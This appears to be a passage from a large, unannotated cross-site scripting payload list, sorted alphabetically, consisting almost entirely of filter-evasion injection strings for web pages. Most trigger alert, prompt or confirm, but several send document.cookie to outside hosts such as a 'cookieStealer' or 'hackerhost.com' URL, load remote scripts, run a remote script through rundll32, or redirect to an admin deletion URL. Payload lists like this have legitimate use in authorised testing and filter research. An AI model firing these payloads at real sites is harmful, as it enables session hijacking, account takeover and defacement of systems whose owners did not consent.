- ;prompt(1)//��;prompt(2)//��;prompt(3)//�V></SCRIPT>��>��><SCRIPT>prompt(4)</SCRIPT>
- “^prompt(9)^”
- “<<prompt(9)<<”
- “<=prompt(9)<=”
- “<prompt(9)<”
- “===prompt(9)===”
- “==prompt(9)==”
- “>=prompt(9)>=”
- “>>>prompt(9)>>>”
- “>>prompt(9)>>”
- “>prompt(9)>”
- “||prompt(9)||”
- “|prompt(9)|”
- “-prompt(9)-”
- “!=prompt(9)!=”
- “?prompt(9):”
- “/prompt(9)/”
- “*prompt(9)*”
- prompt(9)
- prompt`${document.domain}`
- prompt(location.hash)
- //prompt.ml%2f@??
- //prompt.ml%2f@?.ws/?
- prompt = p\u0072om\u0070\u0074
- Prompt = p\u0072om\u0070\u0074
- prompt(‘xss’)
- protected $_expressions = array(
- prototype.join=function(){confirm(“PWND:”+document.body.innerHTML)}’)();
- p=*/</script>’>alert(1)/*<script/1=’
- p[<script>`]=`/alert(70)</script>
- <P><SPAN class=xmsw title=~?O? onmouseout=”window.location=’http://www.xfydyt.com'">F?A?~M</SPAN></P>
- <P STYLE=”behavior:url(‘#default#time2’)” end=”0" onEnd=”javascript:alert(1)”>
- <p style=”font-family:’ar\27 \3bx\3a expression\28xss\28\29\29\3bial’;”></p>
- <p style=”font-family:’foo&#x5c;27&#x5c;3bx:expr&#x65;ession(confirm(1))’”>
- <p style=overflow:auto;font-size:1000px onscroll=alert(33)>script<k/id=die>
- p=<svg/1=’&q=’onload=alert(1)>
- p=<svg 1=’&q=’onload=’/*&r=*/alert(1)’>
- p=<svg 1=’&q=onload=’/*&r=*/alert(1)’>
- p=<svg id=?p=<script/src=//brutelogic.com.br/1%2B onload=location=id>
- p=<svg id=?p=<svg/onload=alert(1)%2B onload=location=id>
- *&p=<svg/onload=eval(0+location.search)>&*/1:alert(document.domain)
- *&p=<svg/onload=eval%280%2Blocation.search%29>&*/1:alert%28document.domain%29
- “‘`><p><svg><script>a=’hello\x27;javascript:alert(1)//’;</script></p>
- <p>This is a secret text.</p>
- pune<script>alert(document.cookie)</script>
- =pwned<svg/onload=prompt(‘XSS\u0020via\u0020sql\u0020injection’)>
- p=’/wp-admin/plugin-editor.php?’
- <?PXML><html:script>alert(29)</html:script>
- <PXML><html:script>alert(30)</html:script>
- ?q=<body style=overflow:auto;height:1000px onscroll=alert(1337) id=x>
- ?q=%ED%A0%80\”))}catch(e){alert(1)}//
- q=e=>{return e};q.constructor(String.raw(q`a${0}e${0}t${0}1337)`,’l’,’r’,’(‘))();
- <Q%^&*(�G@!���� style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
- <q/oncut=alert()>
- <q/oncut=alert(1)>
- <q/oncut=confirm()
- <q/oncut=open>
- <q/oncut=open()>
- ‘/><q/oncut=open()>//
- Qp4LnNlbmQoJCk=
- \";alert('XSS');//
- "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
- >"><script>confirm('hi')</script>"<</a>value=””><script>confirm(‘hi’)</script>”<”/>
- RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
- React.createElement
- {{!ready && (ready = true) && (!call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (‘’+’’.toString(‘F = Function.prototype;’ + ‘F.apply = F.a;’ + ‘delete F.a;’ + ‘delete F.valueOf;’ + ‘alert(1);’)));}}
- <rect fill=”white” style=”clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);”/>
- <rect width=��1000�� height=��1000�� fill=��white��/></a></svg>
- Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
- Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
- Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser
- Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
- Reflect.set(location, ‘href’, ‘javascript:alert(1)’)
- .replace(/.+/,eval)//
- res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
- **/ression(alert(/1/))”>1</div>
- Result => javas + cript: + ale + rt + ( + 1 + )
- Result => javas + cript: + ale + rt + (1)
- Result => javascript:alert(1)
- Result => javascript: + /*click me! + #*/alert(1)
- Result => javascript: +’click me! + #’-alert(1)
- Result => javas + script: + ale + rt + (1)
- Results for <?php echo $_GET[‘q’];?>”:
- return bindingFunction(bindingContext,node);
- return new Function(“$context”,”$element”, functionBody);
- “‘<>\r\n\ being escaped
- ) = )
- (_+`rt(let)`)``
- rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;o=GetObject(“script:http://goo.gl/jApjhr “);o.Exec();close();
- <s “‘“=”” 000=””>
- “‘“><s/000 “‘“><s/000
- <s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s>
- <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
- <S% 00c% 00r% 00% 00ip% 00t> confirm (0); </ s% 00c% 00r% 00% 00ip% 00t>
- <S[0x00]CRIPT>confirm(1)</S[0x00]CRIPT>
- s1=0?’1':’i’; s2=0?’1':’fr’; s3=0?’1':’ame’; i1=s1+s2+s3; s1=0?’1':’jav’; s2=0?’1':’ascr’; s3=0?’1':’ipt’; s4=0?’1':’:’; s5=0?’1':’ale’; s6=0?’1':’rt’; s7=0?’1':’(1)’; i2=s1+s2+s3+s4+s5+s6+s7;
- s1=0?’’:’i’;s2=0?’’:’fr’;s3=0?’’:’ame’;i1=s1+s2+s3;s1=0?’’:’jav’;s2=0?’’:’ascr’;s3=0?’’:’ipt’;s4=0?’’:’:’;s5=0?’’:’ale’;s6=0?’’:’rt’;s7=0?’’:’(1)’;i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
- s1=’java’||’’+’’;s2=’scri’||’’+’’;s3=’pt’||’’+’’;
- s1=[‘java’||’’+’’]; s2=[‘scri’||’’+’’]; s3=[‘pt’||’’+’’];
- s1=[‘java’+’’+’’+’scr’+’ipt’+’:’+’aler’+’t’+’(1)’];
- s1=’’+’java’+’’+’scr’+’’;s2=’’+’ipt’+’:’+’ale’+’’;s3=’’+’rt’+’’+’(1)’+’’; u1=s1+s2+s3;URL=u1
- s1=’’+’java’+’’+’scr’+’’;s2=’’+’ipt’+’:’+’ale’+’’;s3=’’+’rt’+’’+’(1)’+’’;u1=s1+s2+s3;URL=u1
- s1=!’’&&’jav’;s2=!’’&&’ascript’;s3=!’’&&’:’;s4=!’’&&’aler’;s5=!’’&&’t’;s6=!’’&&’(1)’;s7=s1+s2+s3+s4+s5+s6;URL=s7;
- s1=<s>evalalerta(1)a</s>,s2=<s></s>+’’,s3=s1+s2,e1=/s/!=/s/?s3[0]:0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)
- ><s”%2b”cript>alert(document.cookie)</s”%2B”cript>
- ><s%2bcript>alert(document.cookie)</script>
- “><s”%2b”cript>alert(document.cookie)</script>
- ��><s��%2b��cript>alert(document.cookie)</script>
- ><s%2bcript>alert(/Xss-By-Muhaddi/)</script>
- ><s%2bcript>alert(/Xss/)</script>
- ��><s��%2b��cript>alert(/Xss/)</script>
- <! — sample vector → <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:confirm(*num*)>*num*</a>
- <ScaleLoadingMov>1</ScaleLoadingMov>
- <sc#ipt> continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;</script>
- <sc#ipt>continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;</script>
- <sc#ipt>if(top!=self)top.location=location</script>
- <SCR%00IPT>alert(“XSS”)</SCRIPT>
- <SCR%00IPT>confirm(document.location)</SCR%00IPT>
- <scr%00ipt>prompt(1)</sc%00ript>
- <scr%00ript>confirm(0);</scr%00ipt>
- <scr\0ipt>prompt(1)</sc\0ript>
- <<scr\0ipt/src=http://xss.com/xss.js></script
- <<scr\0ipt/src=http://xss.cx/xss.js></script
- “><script>alert('xss')</script>
- <scr<! — esi →ipt>aler<! — esi →t(1)</sc<! — esi →ript>
- <scri%00ipt>confirm(0);</script>
- <scri%00pt>alert(1);</scri%00pt>
- <Scri% 00pt> alert (1); </ scri% 00pt>
- <scri%00pt>confirm(0);</scri%00pt>
- ><scri%00pt>confirm(0);</scri%00pt>
- “<scri%00pt>confirm(0);</scri%00pt>”
- “\”><scri%00pt>confirm(0);</scri%00pt>”,
- <scri%00pt>confirm(1);</scri%00pt>
- </script>
- <script>/*
- <script>
- “<! — <script>”
- “<! — script>”
- “><script>”
- */</script>
- <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
- <script /*%00*/>/*%00*/confirm(1)/*%00*/</script /*%00*/
- <script/%00%00v%00%00>alert(/@jackmasa/)</script> and %c0��//(%000000%0dalert(1)
- <script/%00%00v%00%00>alert(/renwax23/)</script>
- <script/%00%00v%00%00>confirm(/@jackmasa/)</script> and %c0a3//(%000000%0dconfirm(1)//
- <script>({0:#0=alert/#0#/#0#(0)})</script>
- <script>({0:#0=alert/#0#/#0#(123)})</script>
- <script%00>alert(1)</script%00>
- <script>({0:#0=confirm/#0#/#0#(0)})</script>
- <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
- <script%0a%0dConfirm(1);</script>
- <script>//>%0Aalert(1);</script>
- </script%0A-_-><script>confirm(1)</script%0A-_->
- <script%0Caaaaa>alert(123)</script>
- <script>(0)[‘constructor’][‘constructor’](“\141\154\145\162\164(1)”)();</script>
- <script%0Daaa>alert(1)</script%0Daaaa>
- <script>++1-+?(1)</script>
- <script>+-+-1-+-+alert(1)</script>
- <script>/<1/>alert(document.domain)</script></svg>
- <script>$=1,alert($)</script>
- <script>$=1,alert($)</script>//INJECTX
- “<script>1-confirm(0);</script>”/>
- <script>+-+-1-+-+confirm(1)</script>
- “/><script>+-+-1-+-+confirm(1)</script>
- <script>1</script>
- <script>$=1,\u0061lert($)</script>
- >”><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
- <ScRiPt%20>prompt(document.domain)</ScRiPt>
- <script%20src%3D”http%3A%2F%2F0300.0250.0000.0001">
- <script%20src%3D”http%3A%2F%2F0300.0250.0000.0001"><%2Fscript>
- <script%20src=”//www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1">
- <script%20TEST>alert(1)</script%20TESTTEST>
- <ScRipT 5–0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
- <ScRipT 5–0*3?=>prompt(1)</ScRipT giveanswerhere=?
- <script>’a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/, function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>
- <script>a=’abc\*chr*\’;log(*num*)//def’;</script>
- <;SCRIPT a=”;blah”; ‘;’; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <SCRIPT a=”blah” ‘’ SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT>a=document.cookie
- <script>a=eval;b=alert;a(b(/ 1/.source));</script>’”>
- <script>a=eval;b=alert;a(b(/i/.source));</script>
- <SCRIPT “a=’>’” id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
- <SCRIPT a=`>` id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
- <SCRIPT a=”>” ‘’ id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
- <SCRIPT a=”>” id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
- <script>a=`jackmasa<! — <script/\`;</script>
- <script ~~~>alert(0%0)</script ~~~>
- `><script>alert(0)</script>
- <<script>alert(0)</script>
- ‘’;! — “<script>alert(0);</script>=&{()}
- “><script>alert(0)</script>
- ‘’;! — “<script>alert(0);</script>=&{(alert(1))}
- </script>”-alert(0)-”><svg onload=’;alert(178);’>
- \”><script>alert(0x000123)</script>
- \”><sCriPt>alert(0x000123)</sCriPt>
- <script>alert(1)//
- <script>alert(1)//
- “><script>alert(1)<! —
- “><script>alert(1)//
- *//><script>/*alert(1)//
- *//”><script>/*alert(1)//
- <script>alert(1)%0d%0a →%09</script
- <script>alert(1234)</script>
- /<script>alert(1234)</script>
- <ScripT>alert(1234)</ScRipT>
- /<script>alert(1234)</script>##0
- <script>alert(123)</script>
- ><script>alert(123)</script>
- →<script>alert(123)</script>
- ‘><script>alert(123)</script>
- “><script>alert(123)</script>
- scriptalert(123)/script
- &<script>alert(123)</script>=123
- ><script>alert(123);</script x=
- ‘><script>alert(123);</script x=’
- “><script>alert(123);</script x=”
- <script>alert(129)//
- <script>alert(130)<!�V
- <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
- “><script>alert(1337)</script>”><script>alert(“XSS by \nxss</h1></marquee>
- */</script>’>alert(157)/*<script/157=’
- <script>alert(159)</script>
- <script>alert(‘1’)</alert>
- <script>alert(1);&b=bar
- <script>alert(1);/*&b=*/</script>
- <script>({[alert(1)](){}});({get[alert(2)](){}});({set[alert(3)](a){}});</script>
- <script>alert(1)<! — INJECTX
- <script>alert(1)//INJECTX
- <script>alert(1)</script>'><button>CLICK
- <%<! — ‘%><script>alert(1);</script →
- <script<{alert(1)}/></script </>
- <script>/* */alert(1)/* */</script>
- <script>/&/-alert(1)</script>
- <script>”=>” * alert(1)</script>
- <script>({‘ \ ‘(){alert(1)}})[` \ `]()</script>
- <script>alert`1`</script>
- <script>alert(1)</script>
- <script>alert(1)</script>
- <script>alert(1)</script
- <script>alert(1);</script>
- <script /**/>/**/alert(1)/**/</script /**/
- ???script?alert(1)?/script?
- <scRipt>alErt(1)</scrIpt>
- <scRiPt>alert(1);</scrIPt>
- <sCrIpt>alert(1)</script>
- <sCrIpt>alert(1)</ScRipt>
- <sCRiPt>alert(1);</sCRipT>
- <Script>alert(1)</Script>
- <ScRiPt>alert(1)</sCriPt>
- <<SCRIPT>alert(1);//<</SCRIPT>
- */</script>’>alert(1)/*<script/1=’
- &”><script>alert(1)</script>=1
- “><script>alert(1)</script>=1”onPaste=”eval(‘;)\’SSX\’(trela’.split(‘’).reverse().join(‘’))”
- <script>-=alert;-(1)</script> “onmouseover=”confirm(document.domain);”” </script>
- <script>alert(1);</script> <script>prompt(1);</script> <script>confirm (1);</script> <script src=”http://rhainfosec.com/evil.js">
- <script>alert(1)<!�V
- <script>alert(1)<!V
- <script>alert`1`;var something = `abc${alert(1)}def`;``.constructor.constructor`alert\`1\````;</script>
- <script/&>alert(25)</script>
- <script>alert(2)</script> “><img src=x onerror=prompt(document.domain)>
- <script>alert(2)//!#ERROR?&^%$#</script>
- <script>alert(/3/)</script>
- ‘> <script>alert(3)</script>
- > <script>alert(4)</script>
- `> <script>alert(5)</script>
- <script>/&/-alert(7)</script>
- <script>alert(/7/.source)</script>
- <script>+alert(88199)</script>
- <script>alert(/88199/)</script>
- <script>alert(88199)</script>
- <script>alert(/88199/.source)</script>
- “><script>alert(9)</script><a”
- <script>alert(9)</script<br>
- ]]><script>alert(9)</script><![CDATA[
- <script>alert(document.cookie)</script>”>
- <script>alert(document.cookie)</script>
- =’><script>alert(document.cookie)</script>
- ><<script>alert(document.cookie);//<</script>
- ‘><script>alert(document.cookie)</script>
- ‘><script>alert(document.cookie);</script>
- “><<script>alert(document.cookie);//<</script>
- “><script>alert(document.cookie)</script>/><’:
- “><script>alert(document.cookie)</script>
- “/><script>alert(document.cookie);</script>
- ��><<script>alert(document.cookie);//<</script>
- ><ScRiPt>alert(document.cookie)</script>
- ��><ScRiPt>alert(document.cookie)</script>
- “>’><SCRIPT>alert(document.cookie)</SCRIPT>
- <script>alert(document.documentElement.innerHTML.match(/’([^’]%2b)/)[1])</script>
- <script>alert(document.domain)</script>
- <script>alert(document.getElementsByTagName(‘html’)[0].innerHTML.match(/’([^’]%2b)/)[1])</script>
- <script>alert(document.head.childNodes[3].text)</script>
- <script>alert(document.head.innerHTML.substr(146,20));</script>
- “><script>alert(document.location)</script><”
- ?script?alert(�FXSS�F)?/script?
- ?script?alert(FXSSF)?/script?
- <script>alert(“hellox worldss”);</script>
- <script>alert(“hellox worldss”)</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
- <ScRipt>ALeRt(“hi”);</sCRipT>
- <script>alert(navigator.userAgent)<script>
- <script>alert(String.fromCharCode(49,49))</script>
- <script>alert(String.fromCharCode(49))</script>
- <script ^__^>alert(String.fromCharCode(49))</script ^__^
- “><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
- <script>alert(String.fromCharCode(88,83,83))</script>
- “><script>alert(String.fromCharCode(88,83,83))</script>
- “><script alert(String.fromCharCode(88,83,83))</script>
- “><script alert(String.fromCharCode(88,83,83))</script>
- <;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
- <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- ‘><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=”” alt=’
- “><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=”” alt=”
- \’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=”” alt=\’
- <SCRIPT>alert(String.fromCharCode(88))</SCRIPT>
- “><script>alert(‘test’)</script>
- <<SCRIPT>alert(“test”);//<</SCRIPT>
- <<script>alert(“WXSS”);//<</script>
- <script>alert(“WXSS”)</script>
- ><ScRiPt>alert(Xss-By-Muhaddi)</sCrIpT>
- <<SCRIPT>alert(Xss-By-Muhaddi);//<</SCRIPT>
- <script>alert(“XSS by \nxss”)</script><marquee><h1>XSS by xss</h1></marquee>
- “><script>alert(“XSS by \nxss”)</script>><marquee><h1>XSS by xss</h1></marquee>
- ><ScRiPt>alert(xss by shawar)</sCrIpT>
- >/”><script>alert(‘xss message’)</script>
- ‘<script>alert(‘xss message’)</script>
- “><script>alert(‘xss message’)</script>
- =’><script>alert(“xss”)</script>
- →<script>alert(xss);<script>
- ! — “ /><script>alert(‘xss’);</script>
- <script>alert(��Xss��)</script>
- <script>alert(Xss)</script>
- ><script>alert(/Xss/)</script>
- ><script>alert(Xss)</script>
- ��><script>alert(/Xss/)</script>
- ��><script>alert(��Xss��)</script>
- <! — — →<script>alert(‘XSS’);</script><! — — →
- <script>alert(‘XSS’)</script>
- <script>alert(‘XSS’);</script>
- <script>alert(&XSS&)</script>
- >”><script>alert(“XSS”)</script>&
- ‘“><script>alert(‘XSS’)</script>
- ‘“>><script>alert(‘XSS’)</script>
- ‘“>><script>alert(‘XSS’)</script>
- “><script>alert(‘XSS’)</script>
- “><script>alert(��XSS��);</script>
- “><script>alert(XSS);</script>
- &<script>alert(‘XSS’);</script>”>
- <ScRipt>ALeRt(XSS);</sCRipT>
- ><ScRiPt>alert(Xss)</sCrIpT>
- ��><ScRiPt>alert(��Xss��)</sCrIpT>
- <<SCRIPT>alert(��Xss��);//<</SCRIPT>
- <<SCRIPT>alert(Xss);//<</SCRIPT>
- <<SCRIPT>alert(“XSS”);//<</SCRIPT>
- <<SCRIPT>alert(XSS);//<</SCRIPT>
- <;<;SCRIPT>;alert(“;XSS”;);//<;<;/SCRIPT>;
- <;SCRIPT>;alert(‘;XSS’;)<;/SCRIPT>;
- <?=’<SCRIPT>alert(“XSS”)</SCRIPT>’?>
- <?=’<SCRIPT>alert(“XSS”)</SCRIPT>’?>
- <SCRIPT> alert(��XSS��); </SCRIPT>
- <SCRIPT> alert(XSS); </SCRIPT>
- <SCRIPT>alert(‘XSS’)</SCRIPT>
- <SCRIPT>alert(‘XSS’);</SCRIPT>
- <script>alert(‘xss’);</script>
- <script>alert(“xss”);</script>
- ‘/*<script>alert(“xss”)</script>*/%2B’
- <script>alert(“XSS”);</script>&search=1
- <SCRIPT>alert(/XSS/.source)</SCRIPT>
- <script>alert(yXSSz)</script>.
- <script>alert(yXSSz)</script>
- <script>/&/-alert(1)</script>
- <script>[{‘a’:Object.prototype.__defineSetter__(‘b’,function(){alert(arguments[0])}),’b’:[‘secret’]}]</script>
- <script’ + Array(999999).join(‘/’) + ‘>alert(1)<\/script>
- <script>Array.from`1${alert}3${window}2`</script>
- <script>Array.from([1],alert)</script>
- <script>Array.from`${eval}alert\`1\``</script>
- <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js"></SCRIPT>
- <SCRIPT a=`>` SRC=”http://3w.org/xss.js"></SCRIPT>
- <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js"></SCRIPT>
- <SCRIPT a=”>” “ SRC=”http://3w.org/xss.js"></SCRIPT>
- <SCRIPT a=”>” SRC=”http://3w.org/xss.js"></SCRIPT>
- <;SCRIPT “;a=’;>;’;”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <;SCRIPT a=`>;` SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <;SCRIPT a=”;>;”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <;SCRIPT a=”;>’;>”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <SCRIPT “a=’>’” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=`>` SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=”>’>” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=”>” ‘’ SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=”>” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT+a=”>’>” SRC=”http://localhost"></SCRIPT>
- <script “a=’>’” SRC=”http://www.securitycompass.com/xss.js"></script>
- <script a=`>` SRC=”http://www.securitycompass.com/xss.js"></script>
- <script a=”>’>” SRC=”http://www.securitycompass.com/xss.js"></script>
- <script a=”>” ‘’ SRC=”http://www.securitycompass.com/xss.js"></script>
- <script a=”>” SRC=”http://www.securitycompass.com/xss.js"></script>
- <SCRIPT “a=’>’” SRC=”http://xss.cx/xss.js"></SCRIPT>
- <SCRIPT a=`>` SRC=”http://xss.cx/xss.js"></SCRIPT>
- <SCRIPT a=”>” ‘’ SRC=”http://xss.cx/xss.js"></SCRIPT>
- <SCRIPT a=”>” SRC=”http://xss.cx/xss.js"></SCRIPT>
- <SCRIPT “a=’>’” src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT a=”>” ‘’ src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT a=”>” src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT a=”>” SRC=”http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT>a=/XSfS/alert(a.source)</SCRIPT>
- <;SCRIPT>;a=/XSS/
- <SCRIPT>a=/XSS/
- <SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT>
- <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
- <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
- “‘`><script>a=/xss;*chr*;i=0;log(*num*);a/i;</script>
- <SCRIPT>a=/XSS/nalert(‘XSS’);</SCRIPT>
- <script>a=/XSS/\ndocument.vulnerable=true;</script>
- <script>/*//&b=*/alert(1);</script>
- <SCRIPT <B>=alert(‘XSS’);”></SCRIPT>
- ?”></script><base%20c%3D=href%3Dhttps:\mysite>
- <script>’bbbalert(1)cccc’.replace(/a\w{4}\(\d\)/,eval)</script>
- <script <B>document.vulnerable=true;</script>
- <;SCRIPT =”;blah”; SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
- <SCRIPT =”blah” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <script charset=”\x22>javascript:alert(1)</script>
- <script>/* **chr*/log(*num*)// */</script>
- ‘“`><script>/* **chr*log(*num*)// */</script>
- “`’><script>*chr*log(*num*)</script>
- <script>```${``[class extends[alert``]{}]}```</script>
- <script>[class extends[alert````]{}]</script>
- <script ~~~>confirm(0%0)</script ~~~>
- <script>’confirm(0)%3B<%2Fscript>
- ><script>’confirm(0)%3B<%2Fscript>
- “<script>’confirm(0)%3B<%2Fscript>”
- “\”><script>’confirm(0)%3B<%2Fscript>”,
- <script>confirm(0);</script>
- ><script>confirm(0)</script>
- “<script>confirm(0);</script>”
- “><”script”>”confirm(0)”</”script”>
- “\”><script>confirm(0)</script>”,
- <%<! — ‘%><script>confirm(1);</script →
- <sc’+’ript>confirm(1)</script>
- <script>/* */confirm(1)/* */</script>
- <script>confirm (1);</script>
- <script>confirm(1)</script>
- <script ~~~>confirm(1)</script ~~~>
- >”<>”<script>confirm(1)</script>
- “‘><script>confirm(1)</script>”,
- [<script>]=*confirm(1)</script>
- <script Confirm(1);</script>
- “/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>
- “\”/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>”
- >”<>”<script>confirm(2)</script>
- <script>confirm(88199)</script>
- <script>confirm(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,’window’)(),’document’)(), ‘getElementsByTagName’)(‘html’)[0],’innerHTML’)().match(/d.*’/));</script>
- <script>confirm(document.documentElement.innerHTML.match(/’([^’]%2b)/)[1])</script>
- <script>confirm(document.getElementsByTagName(‘html’)[0].innerHTML.match(/’([^’]%2b)/)[1])</script>
- <script>confirm(document.head.childNodes[3].text)</script>
- <script>confirm(document.head.innerHTML.substr(146,20));</script>
- >”><script>confirm(document.location)</script>&
- <SCRIPT>confirm(document.location);</SCRIPT>
- <script>confirm(“"no”)</script>
- <script ^__^>confirm(String.fromCharCode(49))</script ^__^
- <script>confirm(String.fromCharCode(88,83,83));</script>
- ><script>confirm(String.fromCharCode(88,83,83));</script>
- “<script>confirm(String.fromCharCode(88,83,83));</script>”
- “\”><script>confirm(String.fromCharCode(88,83,83));</script>”,
- <script /***/>/***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450’)/***/</script /***/
- <script>/*confirm(“Woops”);*/</script>
- <script>confirm(x.y[0])</script>
- <script>confirm(x.y.x.y.x.y[0]);confirm(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>
- <script>``.constructor.constructor`confirm\`1\````</script>
- <script>continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;</script>
- “><script>co\u006efir\u006d`1`</script>
- “><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
- <script>crypto.generateCRMFRequest(‘CN=0’,0,0,null,’alert(1)’,384,null,’rsa-dual-use’)</script>
- <script>debugger;</script>
- <script defer>alert(1)</script>
- -<script/defer>alert(1)</script>
- <script>delete[a=alert]/prompt a(1)</script>
- <SCriPt>delete alert;alert(1)</sCriPt>
- <script>delete[a=this[atob(‘YWxlcnQ=’)]]/prompt a(1)</script>
- <script>delete /* code to execute */throw~delete~typeof~/* code to execute */delete[a=/* function */]/delete a(/* params */)var a = (new function(/* code to execute */))();</script>
- <script>d.innerHTML+=’’;</script>
- <script>`</div><div>`==alert(123)</script>
- <script>`</div><div>`-alert(123)</script>
- <script>`</div><div>`/=alert(123)</script>
- <script>`</div><div>`/alert(123)</script>
- <script>`</div><div>`*=alert(123)</script>
- <script>`</div><div>`%alert(123)</script>
- <script>`</div><div>`+alert(123)</script>
- //’/<@/></script></div></script> →<select */onclick=alert()><o>1<o>2')//”<! —
- <script>document.body.innerHTML=”<h1>XSS-Here</h1>”</script>
- <script>document.forms[0].submit(); </script>
- <script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({‘type’:’click’,’isTrusted’:true}); </script>
- <script> document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click({‘type’:’click’,’isTrusted’:true}); </script>
- <script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
- <script>document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;</script>
- “><script>document.location=’http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>
- “><script>document.location=’http://your.site.com/cgi-bin/cookie.cgi?'???.cookie</script>
- <<script>document.vulnerable=true;</script>
- <! — — →<script>document.vulnerable=true;</script><! — — →
- <![<! — ]]<script>document.vulnerable=true;// →</script>
- <script>document.vulnerable=true;</script>
- &<script>document.vulnerable=true;</script>
- <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
- <script>document.write(‘\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076’);</script>
- <script>document[‘write’](88199);</script>
- <script>document.write(‘<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>’);</script>
- <script>document.write(Array(184).join(‘<marquee>’))</script>
- <script>document.write(‘<img src=1 onerror=alert(1)>’);</script>
- <script>document.write(“<img/**/src=’1'/**/onerror=’alert(1)’/>”);</script>
- <SCRIPT>Document.write(‘<img src=\’http://hackerhost.com/getcookie.php?cookie='+escape(document.cookie)+'\' height=1 width=1>’);</SCRIPT>
- <script>document.write(“<img src=//xss.cx/” + document.cookie + “>”)</script>
